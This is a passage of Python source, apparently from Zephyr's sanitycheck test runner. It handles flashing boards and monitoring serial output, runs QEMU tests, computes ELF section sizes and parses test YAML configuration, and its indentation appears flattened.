subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(runner)
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
# There is a possibility that we polled nothing because the host
# did not schedule the QEMU process enough CPU time during
# p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# Sometimes QEMU can't handle the SIGTERM signal correctly;
# in that case kill the QEMU process directly (SIGKILL) and let
# sanitycheck judge the test result from the console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
self.returncode = 0
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP cannot be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
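# Illustrative line of `objdump -h` output that the loop below parses
# (hypothetical values): words[0] is the index, words[1] the section name,
# words[2] the size (hex), words[3] the VMA and words[4] the LMA:
#   1 text 00004f2c 00000000 00000000 000000d4 2**2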
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in an ad hoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
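# Illustrative (hypothetical) valid_keys entry and its effect in get_test:
#
#   valid_keys = {"timeout": {"type": "int", "default": 60},
#                 "tags": {"type": "set", "required": False}}
#
# A test section providing "timeout: 120" yields d["timeout"] == 120, while a
# missing "tags" key yields the default set() produced by _cast_value("", "set").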
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
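# Illustrative (hypothetical) example of the unique name computed above: for a
# testcase root of $ZEPHYR_BASE/tests/kernel/mutex, a workdir of "mutex_api"
# and a name of "kernel.mutex", the unique name becomes
# "tests/kernel/mutex/mutex_api/kernel.mutex".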
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
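# Illustrative source lines (hypothetical test code) matched by stc_regex above:
#   ztest_unit_test(test_mutex_lock)                  -> stc_name 'test_mutex_lock'
#   ztest_user_unit_test_setup_teardown(test_x, a, b) -> stc_name 'test_x'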
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# Right now we only support building on Windows; running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
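# The instance is actually run only when nothing above forced a build-only
# pass (_build_only is False) and the platform/handler combination is
# runnable; everything else falls back to a build-only instance.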
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
